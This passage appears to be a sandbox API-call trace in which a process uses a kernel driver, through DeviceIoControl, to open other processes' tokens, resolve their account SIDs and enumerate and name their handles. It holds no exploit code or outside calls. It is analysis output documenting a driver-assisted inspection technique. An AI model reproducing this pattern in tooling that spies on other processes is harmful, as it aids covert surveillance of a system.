Handle=0xffffd000ac0cf4a0*=0xffffffff80000a4c) returned 0x0 [0291.968] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x28020 [0291.968] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a4c, DesiredAccess=0x8, TokenHandle=0xffffe0006a51d480 | out: TokenHandle=0xffffe0006a51d480*=0x18c) returned 0x0 [0291.968] ZwClose (Handle=0xffffffff80000a4c) returned 0x0 [0291.968] IoCompleteRequest () returned 0x0 [0291.968] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.968] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.968] CloseHandle (hObject=0x18c) returned 1 [0291.968] CloseHandle (hObject=0x188) returned 1 [0291.968] PsLookupProcessByProcessId (in: ProcessId=0xe58, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.969] PsAcquireProcessExitSynchronization () returned 0x0 [0291.969] KeStackAttachProcess (in: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400) [0291.969] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069084250, HandleInformation=0x0) returned 0x0 [0291.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.969] PsReleaseProcessExitSynchronization () returned 0x2 [0291.969] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x2001e [0291.969] ObQueryNameString (in: Object=0xffffe00069084250, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.969] ObfDereferenceObject (Object=0xffffe00069084250) returned 0x7fd9 [0291.969] IoCompleteRequest () returned 0x0 [0291.969] PsLookupProcessByProcessId (in: ProcessId=0xe58, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.969] PsAcquireProcessExitSynchronization () returned 0x0 [0291.969] KeStackAttachProcess (in: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400) [0291.969] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693ed4b0, HandleInformation=0x0) returned 0x0 [0291.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.969] PsReleaseProcessExitSynchronization () returned 0x2 [0291.969] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x2001d [0291.969] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.969] ObfDereferenceObject (Object=0xffffe000693ed4b0) returned 0x7fff [0291.969] IoCompleteRequest () returned 0x0 [0291.969] PsLookupProcessByProcessId (in: ProcessId=0xe58, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.969] PsAcquireProcessExitSynchronization () returned 0x0 [0291.969] KeStackAttachProcess (in: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400) [0291.969] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006913a090, HandleInformation=0x0) returned 0x0 [0291.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.969] PsReleaseProcessExitSynchronization () returned 0x2 [0291.969] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x2001c [0291.969] ObQueryNameString (in: Object=0xffffe0006913a090, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.969] ObfDereferenceObject (Object=0xffffe0006913a090) returned 0x7fff [0291.969] IoCompleteRequest () returned 0x0 [0291.969] PsLookupProcessByProcessId (in: ProcessId=0xe58, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.969] PsAcquireProcessExitSynchronization () returned 0x0 [0291.969] KeStackAttachProcess (in: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400) [0291.969] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069412090, HandleInformation=0x0) returned 0x0 [0291.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.969] PsReleaseProcessExitSynchronization () returned 0x2 [0291.969] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x2001b [0291.969] ObQueryNameString (in: Object=0xffffe00069412090, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.969] ObfDereferenceObject (Object=0xffffe00069412090) returned 0x7fff [0291.969] IoCompleteRequest () returned 0x0 [0291.969] PsLookupProcessByProcessId (in: ProcessId=0xe58, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.969] PsAcquireProcessExitSynchronization () returned 0x0 [0291.969] KeStackAttachProcess (in: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a67080, ApcState=0xffffd000ac0cf400) [0291.969] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069410090, HandleInformation=0x0) returned 0x0 [0291.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.970] PsReleaseProcessExitSynchronization () returned 0x2 [0291.970] ObfDereferenceObject (Object=0xffffe00068a67080) returned 0x2001a [0291.970] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.970] ObfDereferenceObject (Object=0xffffe00069410090) returned 0x8000 [0291.970] IoCompleteRequest () returned 0x0 [0291.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xedc) returned 0x188 [0291.970] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.970] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069f326c0, HandleInformation=0x0) returned 0x0 [0291.970] ObOpenObjectByPointer (in: Object=0xffffe00069f326c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a4c) returned 0x0 [0291.970] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x2ffeb [0291.970] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a4c, DesiredAccess=0x8, TokenHandle=0xffffe0006a51d480 | out: TokenHandle=0xffffe0006a51d480*=0x18c) returned 0x0 [0291.970] ZwClose (Handle=0xffffffff80000a4c) returned 0x0 [0291.970] IoCompleteRequest () returned 0x0 [0291.970] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.970] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.274] CloseHandle (hObject=0x18c) returned 1 [0292.274] CloseHandle (hObject=0x188) returned 1 [0292.274] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.274] PsAcquireProcessExitSynchronization () returned 0x0 [0292.274] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.275] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691aef20, HandleInformation=0x0) returned 0x0 [0292.275] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.275] PsReleaseProcessExitSynchronization () returned 0x2 [0292.275] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe9 [0292.275] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.275] ObfDereferenceObject (Object=0xffffe000691aef20) returned 0x1fffb [0292.275] IoCompleteRequest () returned 0x0 [0292.275] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.275] PsAcquireProcessExitSynchronization () returned 0x0 [0292.275] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.275] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a294aa0, HandleInformation=0x0) returned 0x0 [0292.275] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.275] PsReleaseProcessExitSynchronization () returned 0x2 [0292.275] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe8 [0292.275] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.275] ObfDereferenceObject (Object=0xffffe0006a294aa0) returned 0x7fff [0292.275] IoCompleteRequest () returned 0x0 [0292.275] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.275] PsAcquireProcessExitSynchronization () returned 0x0 [0292.275] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.275] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3fe580, HandleInformation=0x0) returned 0x0 [0292.275] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.275] PsReleaseProcessExitSynchronization () returned 0x2 [0292.275] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe7 [0292.275] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.275] ObfDereferenceObject (Object=0xffffe0006a3fe580) returned 0x7fff [0292.275] IoCompleteRequest () returned 0x0 [0292.275] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.275] PsAcquireProcessExitSynchronization () returned 0x0 [0292.275] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.275] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f34f20, HandleInformation=0x0) returned 0x0 [0292.275] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.275] PsReleaseProcessExitSynchronization () returned 0x2 [0292.275] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe6 [0292.275] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.275] ObfDereferenceObject (Object=0xffffe00069f34f20) returned 0x7ff4 [0292.275] IoCompleteRequest () returned 0x0 [0292.275] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.275] PsAcquireProcessExitSynchronization () returned 0x0 [0292.275] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.275] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6c2f20, HandleInformation=0x0) returned 0x0 [0292.275] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.275] PsReleaseProcessExitSynchronization () returned 0x2 [0292.275] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe5 [0292.276] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.276] ObfDereferenceObject (Object=0xffffe0006a6c2f20) returned 0x1fff3 [0292.276] IoCompleteRequest () returned 0x0 [0292.276] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.276] PsAcquireProcessExitSynchronization () returned 0x0 [0292.276] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.276] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0292.276] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.276] PsReleaseProcessExitSynchronization () returned 0x2 [0292.276] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe4 [0292.276] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.276] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x2ff90 [0292.276] IoCompleteRequest () returned 0x0 [0292.276] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.276] PsAcquireProcessExitSynchronization () returned 0x0 [0292.276] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.276] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0292.276] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.276] PsReleaseProcessExitSynchronization () returned 0x2 [0292.276] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe3 [0292.276] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.276] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x2ff8f [0292.276] IoCompleteRequest () returned 0x0 [0292.276] PsLookupProcessByProcessId (in: ProcessId=0xedc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.277] PsAcquireProcessExitSynchronization () returned 0x0 [0292.277] KeStackAttachProcess (in: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069f326c0, ApcState=0xffffd000ac0cf400) [0292.277] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bc830, HandleInformation=0x0) returned 0x0 [0292.277] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.277] PsReleaseProcessExitSynchronization () returned 0x2 [0292.277] ObfDereferenceObject (Object=0xffffe00069f326c0) returned 0x27fe2 [0292.277] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.277] ObfDereferenceObject (Object=0xffffe000693bc830) returned 0x17ff9 [0292.277] IoCompleteRequest () returned 0x0 [0292.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5c0) returned 0x188 [0292.277] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0292.277] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a320080, HandleInformation=0x0) returned 0x0 [0292.277] ObOpenObjectByPointer (in: Object=0xffffe0006a320080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff800006fc) returned 0x0 [0292.277] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x27fe8 [0292.277] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800006fc, DesiredAccess=0x8, TokenHandle=0xffffe0006a735d00 | out: TokenHandle=0xffffe0006a735d00*=0x18c) returned 0x0 [0292.277] ZwClose (Handle=0xffffffff800006fc) returned 0x0 [0292.277] IoCompleteRequest () returned 0x0 [0292.277] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0292.277] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.278] CloseHandle (hObject=0x18c) returned 1 [0292.278] CloseHandle (hObject=0x188) returned 1 [0292.278] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.278] PsAcquireProcessExitSynchronization () returned 0x0 [0292.278] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.278] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bda90, HandleInformation=0x0) returned 0x0 [0292.278] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.278] PsReleaseProcessExitSynchronization () returned 0x2 [0292.278] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe6 [0292.278] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.278] ObfDereferenceObject (Object=0xffffe000693bda90) returned 0x7fff [0292.278] IoCompleteRequest () returned 0x0 [0292.278] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.278] PsAcquireProcessExitSynchronization () returned 0x0 [0292.278] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.278] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691c9f20, HandleInformation=0x0) returned 0x0 [0292.278] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.278] PsReleaseProcessExitSynchronization () returned 0x2 [0292.278] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe5 [0292.278] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.278] ObfDereferenceObject (Object=0xffffe000691c9f20) returned 0x7fff [0292.279] IoCompleteRequest () returned 0x0 [0292.279] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.279] PsAcquireProcessExitSynchronization () returned 0x0 [0292.279] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.279] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a90b4b0, HandleInformation=0x0) returned 0x0 [0292.279] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.279] PsReleaseProcessExitSynchronization () returned 0x2 [0292.279] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe4 [0292.279] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.279] ObfDereferenceObject (Object=0xffffe0006a90b4b0) returned 0x7fc0 [0292.279] IoCompleteRequest () returned 0x0 [0292.279] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.279] PsAcquireProcessExitSynchronization () returned 0x0 [0292.279] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.279] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000746877c0, HandleInformation=0x0) returned 0x0 [0292.279] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.279] PsReleaseProcessExitSynchronization () returned 0x2 [0292.279] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe3 [0292.279] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.279] ObfDereferenceObject (Object=0xffffe000746877c0) returned 0xffff [0292.279] IoCompleteRequest () returned 0x0 [0292.279] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.279] PsAcquireProcessExitSynchronization () returned 0x0 [0292.279] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.279] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6d5c30, HandleInformation=0x0) returned 0x0 [0292.279] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.279] PsReleaseProcessExitSynchronization () returned 0x2 [0292.279] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe2 [0292.279] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.279] ObfDereferenceObject (Object=0xffffe0006a6d5c30) returned 0x7ffd [0292.279] IoCompleteRequest () returned 0x0 [0292.279] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.279] PsAcquireProcessExitSynchronization () returned 0x0 [0292.279] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: 